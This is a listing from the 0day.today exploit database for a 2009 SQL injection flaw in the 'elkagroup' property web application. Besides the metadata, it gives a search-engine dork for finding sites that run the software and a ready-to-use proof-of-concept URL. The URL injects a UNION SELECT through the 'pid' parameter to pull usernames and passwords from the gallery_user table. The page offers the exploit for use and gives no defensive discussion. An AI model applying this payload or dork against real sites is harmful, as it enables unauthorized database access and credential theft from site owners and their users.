[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

elkagroup (pid ) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10501
Category
web applications
Date add
30-12-2009
Platform
unsorted
===================================================
elkagroup (pid ) Remote SQL Injection Vulnerability
===================================================

||| script : http://www.elkapax.com &  http://www.elkagroup.com
 
||| DorK   : "Powered by : elkagroup.com<http://elkagroup.com>"
 
POC
________
 
http://[server]/[path]/property.php?cid=12&uid=0&pid=-168+union+select+1,username,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17+from+gallery_user--



#  0day.today [2024-11-16]  #